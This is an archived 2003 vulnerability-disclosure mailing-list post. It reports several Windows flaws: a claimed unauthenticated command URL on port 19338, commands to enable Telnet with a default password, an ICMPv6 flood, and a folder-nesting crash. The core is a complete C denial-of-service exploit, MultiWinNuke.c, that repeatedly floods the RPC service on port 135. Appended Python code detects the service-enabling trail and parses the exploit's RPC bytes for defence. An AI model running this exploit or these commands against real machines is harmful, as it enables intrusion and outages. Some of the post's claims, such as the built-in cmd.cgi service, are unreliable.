New Security Vulnerabilities

From: mba1at_private
Date: Tue Jun 03 2003 - 15:34:17 PDT


    Hello, I'm Moshe BA from Israel, a.k.a. Trancer, and I would like to report 4-5
    security bugs/vulnerabilities which I found.
    (Note: I'm sorry if my English is a bit bad, I'm an Israeli after all.)
    
    I've already talked with Dave McKinney via e-mail and he referred me to this
    e-mail address.
    This is the talk we had:
    
    From:  Dave McKinney <dmat_private> 
    To:  mba1at_private <mba1at_private> 
    Subject:  RE: New Security Vulnerabilities (fwd) 
    Date:  Tue, 3 Jun 2003 14:27:55 -0600 (MDT) 
    
    Trancer, 
    
    Can you send your report to the vuln-dev mailing list 
    (vuln-devat_private)? 
    
    Dave McKinney 
    Symantec 
    
    keyID: BF919DD7 
    key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 
    
    
    On Tue, 3 Jun 2003, mba1at_private wrote: 
    
    > No you don't, that's what makes it so easy to hack Windows Server 2003. And 
    > that's the reason I want this vulnerability to be reported. 
    > 
    > Original Message: 
    > ----------------- 
    > From: Dave McKinney dmat_private 
    > Date: Tue, 3 Jun 2003 09:05:29 -0600 (MDT) 
    > To: mba1at_private 
    > Subject: RE: New Security Vulnerabilities (fwd) 
    > 
    > 
    > 
    > Hmm do you need to enter the admin or other user password to access the 
    > command line on port 19338? 
    > 
    > Dave McKinney 
    > Symantec 
    > 
    > keyID: BF919DD7 
    > key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 
    > 
    > 
    > On Mon, 2 Jun 2003, mba1at_private wrote: 
    > 
    > > I prefer Trancer (over Moshe). 
    > > I didn't really understand your question. Please ask again in an 
    > > easier way (after all, I'm an Israeli). 
    > > 
    > > Original Message: 
    > > ----------------- 
    > > From: Dave McKinney dmat_private 
    > > Date: Mon, 2 Jun 2003 16:34:47 -0600 (MDT) 
    > > To: mba1at_private, vuldbat_private 
    > > Subject: New Security Vulnerabilities (fwd) 
    > > 
    > > 
    > > 
    > > Moshe, with regards to issue #2, I am assuming you need valid credentials 
    > > to access the command line interpreter on port 19338? 
     
    Now, these are the security bugs/vulnerabilities.
    
    **********
    
    The first one is two Windows Server 2003 security vulnerabilities.
    
    1. Windows 2003 Server has a built-in command line interpreter (I don't
    know if this service is enabled by default, but I've tested this on 9
    systems and in 7 of them it worked), which means that you can send commands
    to it over HTTP (TCP) from a web browser by accessing the server on port
    19338 like this:
    
    http://admin@<target>:19338/cmd.cgi?cmd=<EnterCommandHere>
    
    That will cause the server to run the command from the $ROOT$ drive,
    which may be C, D, E or any other drive defined by the owner/admin
    of the machine. 
    Note that no username or password is required.
    
    2. Windows 2003 Server has a built-in Telnet service (disabled by default)
    that listens for connections on port 3382.
    An attacker can exploit the first vulnerability (#1 above) and send these
    commands through it:
    
    "sc config TlntSvr start= auto" 
    and then:
    "net start TlntSvr"
    
    Then the attacker has FULL access to the system.
    Only a password is required, and because I've just enabled this service,
    the password is also set to the default - 
    Password: tlntadmn
    
    Note that if this service is already enabled, the password will be wrong
    (only if the system admin changed it).
    If that service is already enabled with another password, the attacker can
    open a sharing service or any other service that can give him easy 
    access to the system.
    
    **********
    
    The second one is Windows NT (2000/XP/2003) ICMPv6 flooding.
    This little denial of service attack works just like an ICMP flood but uses
    the ping6 tool (on an IPv6-enabled Windows OS or an IPv6-enabled *nix OS).
    This attack is also good because Microsoft's Internet Connection Firewall
    is unable to block IPv6 traffic.
    This is maybe a slow attack but effective; it also depends on the
    attacker's and victim's bandwidth.
    An exploit for this can be easily made, and I am working on one.
    
    
    **********
    
    This bug will make Windows XP (all editions) crash.
    Create 122 folders one inside the other, naming them with one character (like
    '1' or '0'). Now go to the one before the last directory and right-click the last 
    folder. Hover the mouse over the pop-up menu and the system will crash.
    Stupid one, but it does crash the system.
    
    
    **********
    
    This is an upgraded exploit which will DoS and crash a remote machine using
    the WinNuke.c exploit that exploits the Microsoft Windows RPC Service Denial
    of Service Vulnerability.
    I've discovered that you can STILL DoS and crash it even if it's patched
    (with an official M$ patch) against it, by simply nuking it a lot of times,
    and fast.
    This is the exploit (MultiWinNuke.c a.k.a. FixedWinNuke.c):
    
    ### Start MultiWinNuke.c ###
    
    /*
    * Microsoft Windows NT RPC Service Denial of Service Vulnerability
    *
    * Original Code By Lion @ http://www.cnhonker.com
    * Upgraded By Trancer @ http://BinaryVision.tech.nu
    *
    * I have noticed that even after a Windows NT system is patched against this
    * vulnerability with an official M$ update, an attacker can still DoS that
    * system if he runs this exploit a lot of times, fast.
    * So I've upgraded the exploit by looping it and letting you control the
    * number of times you want to nuke a system
    * (with a patched 2000\XP 250-400 times is recommended).
    *
    * That's it. enjoy :-)
    */
    
    #include <winsock2.h>
    #include <stdio.h>
    #include <stdlib.h>   /* exit(), atoi() */
    #include <string.h>   /* memcpy(), memset() */
    
    #pragma comment(lib, "ws2_32.lib")
    
    /* Payload bytes are kept exactly as in the original: a DCE/RPC bind PDU
       followed by the start of a request PDU, then the fragments that follow. */
    char sendcode1[] = 
      "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
      "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
      "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
      "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
      "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
      "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
      "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";
    
    char sendcode2[] = 
      "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";
    
    char sendcode3[] = 
      "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";
    
    char sendcode4[] = 
      "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d" 
      "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\x50\x10\x01\x00\x00\x00\x02\x00";
    
    char sendcode5[] = 
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\x80\xf9\x00\x00\x00\x00\x02\x00";
    
    char sendcode6[] = 
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\xb0\xe2\x00\x00\x00\x00\x02\x00";
    
    char sendcode7[] = 
      "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
      "\x60\x15\x00\x00\x00\x00\x02\x00";
    
    char sendcode8[] = 
      "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";
    
    int main(int argc, char *argv[])
    {
      WSADATA wsaData;
      WORD wVersionRequested;
      struct hostent *pTarget;
      struct sockaddr_in sock;
      char *targetip;
      int port, bufsize, times, i;
      SOCKET s;
      char buffer[20480];
    
      printf("======================= Windows NT Multi RPC Nuke V0.12 ======================\r\n");
      printf("=============== Original Code By Lion @ http://www.cnhonker.com ===============\r\n");
      printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu ==============\r\n\n");
    
      if (argc < 2)
      {
        printf("Usage:\r\n");
        printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>\r\n", argv[0]);
        printf("Example: %s 198.167.0.1 135 512 250\r\n", argv[0]);
        printf("PS:\r\n");
        printf(" If target is XP, try 2 times.\r\n");
        exit(1);
      }
    
      /* WSAStartup returns non-zero on failure, not a negative value. */
      wVersionRequested = MAKEWORD(1, 1);
      if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;
    
      targetip = argv[1];
      port = 135;
      if (argc >= 3) port = atoi(argv[2]);
      bufsize = 512;                 /* accepted for compatibility; the fill sizes below are fixed */
      if (argc >= 4) bufsize = atoi(argv[3]);
      (void)bufsize;
      times = 1;
      if (argc >= 5) times = atoi(argv[4]);
    
      /* Resolve the target once instead of on every round. */
      printf("Resolving Hostnames...\n");
      if ((pTarget = gethostbyname(targetip)) == NULL)
      {
        printf("Resolve of %s failed, please try again.\n", argv[1]);
        WSACleanup();
        exit(1);
      }
    
      memset(&sock, 0, sizeof(sock));
      memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
      sock.sin_family = AF_INET;
      sock.sin_port = htons((USHORT)port);
    
      /* One fresh TCP connection per round. The original also incremented i at the
         end of the loop body, which silently halved the number of rounds requested. */
      for (i = 0; i < times; i++)
      {
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s == INVALID_SOCKET)
        { 
          printf("Socket error!\r\n");
          WSACleanup();
          exit(1);
        }
    
        printf("Connecting...\n");
        if (connect(s, (struct sockaddr *)&sock, sizeof(sock)) != 0)
        {
          printf("Couldn't connect to host.\n");
          closesocket(s);
          WSACleanup();
          exit(1);
        }
    
        printf("Connected!...\n");
        printf("Sending Packets...\n");
        /* Bind PDU plus the first request header (sizeof - 1 drops the string terminator). */
        if (send(s, sendcode1, sizeof(sendcode1) - 1, 0) == -1)
        {
          printf("Error sending nuke Packets\r\n");
          closesocket(s);
          WSACleanup();
          exit(1);
        }
    
        /* Each fragment header is followed by a block of filler bytes. */
        memset(buffer, '\x41', 240);
        send(s, buffer, 240, 0);
    
        send(s, sendcode2, sizeof(sendcode2) - 1, 0);
        memset(buffer, '\x42', 5000);
        send(s, buffer, 5000, 0);
    
        send(s, sendcode3, sizeof(sendcode3) - 1, 0);
        memset(buffer, '\x43', 512);
        send(s, buffer, 512, 0);
      
        send(s, sendcode4, sizeof(sendcode4) - 1, 0);
        memset(buffer, '\x44', 20480);
        send(s, buffer, 20480, 0);
    
        memset(buffer, '\x44', 5000);
        send(s, buffer, 5000, 0);
    
        send(s, sendcode5, sizeof(sendcode5) - 1, 0);
        memset(buffer, '\x45', 5000);
        send(s, buffer, 5000, 0);
    
        send(s, sendcode6, sizeof(sendcode6) - 1, 0);
        memset(buffer, '\x46', 5000);
        send(s, buffer, 5000, 0);
    
        send(s, sendcode7, sizeof(sendcode7) - 1, 0);
        memset(buffer, '\x47', 5000);
        send(s, buffer, 5000, 0);
    
        send(s, sendcode8, sizeof(sendcode8) - 1, 0);
        memset(buffer, '\x48', 5000);
        send(s, buffer, 5000, 0);
    
        /* Release this round's socket; the original only closed the last one. */
        closesocket(s);
      }
    
      if (times < 2)
      {
        printf("Nuked! If target is XP, try again! :)\r\n");
      }
      else
      {
        printf("%s was nuked %d times\r\n", argv[1], times);
      }
      
      WSACleanup();
      return 0;
    }
    
    ### End MultiWinNuke.c ###
    
    
    That's it. Note that all of the bugs above were found by me, and I'll be glad if
    they are reported. 
    Trancer
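
The two service-control commands in issue #2 leave a trail on the target: the Windows Service Control Manager logs event 7040 when a service's start type is changed and event 7036 when a service enters the running state. The following is an added example, not part of Trancer's post, that runs that detection over a constructed, simplified export of the System log (one event per line as `EventID|Message`). The line format is an assumption made for this example; the event IDs and message wording are the SCM's own. It is written generally, flagging any service taken from disabled to running rather than only TlntSvr, since the post notes an attacker could enable some other service the same way.

```python
import re

# Constructed sample export of the Windows System log (not real data):
# one Service Control Manager event per line, "EventID|Message".
SAMPLE_EVENTS = """\
7036|The Windows Time service entered the running state.
7040|The start type of the Telnet service was changed from disabled to auto start.
7036|The Telnet service entered the running state.
7040|The start type of the Windows Update service was changed from auto start to demand start.
7036|The Windows Update service entered the running state.
7036|The Print Spooler service entered the stopped state.
"""

# Event 7040: start type changed. Event 7036: service changed state.
RE_7040 = re.compile(
    r"^The start type of the (?P<svc>.+) service was changed "
    r"from (?P<old>.+?) to (?P<new>.+?)\.$")
RE_7036 = re.compile(r"^The (?P<svc>.+) service entered the (?P<state>\w+) state\.$")


def parse_events(text):
    """Turn the export into a list of (event_id, message) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event_id, _, message = line.partition("|")
        events.append((int(event_id), message.strip()))
    return events


def find_enabled_then_started(events, watch=None):
    """Return one dict per service whose start type was changed away from
    'disabled' (7040) and which entered the running state afterwards (7036).
    `watch` optionally restricts the check to a set of display names."""
    pending = {}   # service display name -> (old start type, new start type)
    hits = []
    for event_id, message in events:
        if event_id == 7040:
            m = RE_7040.match(message)
            if m and m["old"] == "disabled" and (watch is None or m["svc"] in watch):
                pending[m["svc"]] = (m["old"], m["new"])
        elif event_id == 7036:
            m = RE_7036.match(message)
            if m and m["state"] == "running" and m["svc"] in pending:
                old, new = pending.pop(m["svc"])
                hits.append({"service": m["svc"], "from": old, "to": new})
    return hits


if __name__ == "__main__":
    for hit in find_enabled_then_started(parse_events(SAMPLE_EVENTS)):
        print("ALERT: %(service)s enabled (%(from)s -> %(to)s) and then started" % hit)
```

On the sample above only the Telnet service matches: Windows Update also changed start type and started, but it was never disabled, so the pairing logic ignores it. In a real deployment the same two regexes apply to the Message field of the exported events.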
    
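
What MultiWinNuke.c writes to port 135 is a DCE/RPC bind PDU followed by request fragments whose headers and whose actual byte counts do not agree. The following is an added example, not from the original post and not from Lion's or Trancer's code: it decodes the bind and request headers from the byte strings above and then walks the stream by each PDU's declared frag_length, as a receiving RPC runtime would, stopping where the next claimed header is not an RPC header at all. It assumes little-endian data representation (the drep byte 0x10 in the stream says so), prints the interface UUID exactly as decoded from the bytes, and makes no claim about why the service fails.

```python
import struct
import uuid

# Byte strings copied from MultiWinNuke.c (sendcode1..sendcode4) and the filler
# the exploit sends between them, assembled in the order the loop body sends them.
# Only this first part of the sequence is needed to show the mismatch.
SENDCODE1 = (
    b"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
    b"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
    b"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
    b"\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
    b"\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
    b"\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
    b"\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00")
SENDCODE2 = b"\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00"
SENDCODE3 = (
    b"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00")
SENDCODE4 = (
    b"\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d"
    b"\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
    b"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
    b"\x50\x10\x01\x00\x00\x00\x02\x00")
STREAM = (SENDCODE1 + b"A" * 240 + SENDCODE2 + b"B" * 5000
          + SENDCODE3 + b"C" * 512 + SENDCODE4 + b"D" * 20480)

PTYPE_REQUEST, PTYPE_BIND = 0, 11


def parse_pdu(buf, off):
    """Decode the 16-byte DCE/RPC common header at `off` and the bind- or
    request-specific fields after it. Little-endian drep (0x10) is assumed."""
    if off + 16 > len(buf):
        return None
    (rpc_vers, rpc_vers_minor, ptype, pfc_flags, drep,
     frag_length, auth_length, call_id) = struct.unpack_from("<BBBB4sHHI", buf, off)
    pdu = {"offset": off, "rpc_vers": rpc_vers, "ptype": ptype,
           "pfc_flags": pfc_flags, "frag_length": frag_length,
           "auth_length": auth_length, "call_id": call_id,
           "valid": rpc_vers == 5 and (drep[0] & 0x10) != 0}
    body = off + 16
    if not pdu["valid"]:
        return pdu
    if ptype == PTYPE_BIND:
        max_xmit, max_recv, assoc_group, n_ctx = struct.unpack_from("<HHIB", buf, body)
        # First presentation context: id and transfer-syntax count (plus padding),
        # then abstract syntax (uuid + version) and the first transfer syntax.
        ctx_id, n_xfer = struct.unpack_from("<HB", buf, body + 12)
        abstract = buf[body + 16:body + 32]
        a_major, a_minor = struct.unpack_from("<HH", buf, body + 32)
        transfer = buf[body + 36:body + 52]
        pdu.update(max_xmit=max_xmit, max_recv=max_recv, assoc_group=assoc_group,
                   n_contexts=n_ctx, ctx_id=ctx_id, n_transfer_syntaxes=n_xfer,
                   abstract_syntax=str(uuid.UUID(bytes_le=abstract)),
                   abstract_version=(a_major, a_minor),
                   transfer_syntax=str(uuid.UUID(bytes_le=transfer)))
    elif ptype == PTYPE_REQUEST:
        alloc_hint, ctx_id, opnum = struct.unpack_from("<IHH", buf, body)
        pdu.update(alloc_hint=alloc_hint, ctx_id=ctx_id, opnum=opnum)
    return pdu


def walk_pdus(buf):
    """Walk the stream the way a receiver would, jumping by each PDU's declared
    frag_length. The walk ends at the first position that does not hold a valid
    RPC header: that is where declared lengths and bytes actually sent diverge."""
    pdus, off = [], 0
    while True:
        pdu = parse_pdu(buf, off)
        if pdu is None:
            break
        pdus.append(pdu)
        if not pdu["valid"] or pdu["frag_length"] == 0:
            break
        off += pdu["frag_length"]
    return pdus


if __name__ == "__main__":
    for pdu in walk_pdus(STREAM):
        print({k: (hex(v) if k in ("pfc_flags", "rpc_vers") else v) for k, v in pdu.items()})
```

Run stand-alone it prints three entries: the bind (call_id 2, 72 bytes, one presentation context), the first request fragment (frag_length 5840, pfc_flags 0x01 so PFC_FIRST_FRAG without PFC_LAST_FRAG, alloc_hint 75552, opnum 2) and, at offset 5912 where the receiver expects the next fragment, a "header" that begins 0xfe 0xff, i.e. the filler and the next sendcode are not where the declared fragment length says they should be. The same walk over a capture is a cheap way to pick this traffic out of legitimate port 135 sessions.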
    



    This archive was generated by hypermail 2b30 : Wed Jun 04 2003 - 14:51:52 PDT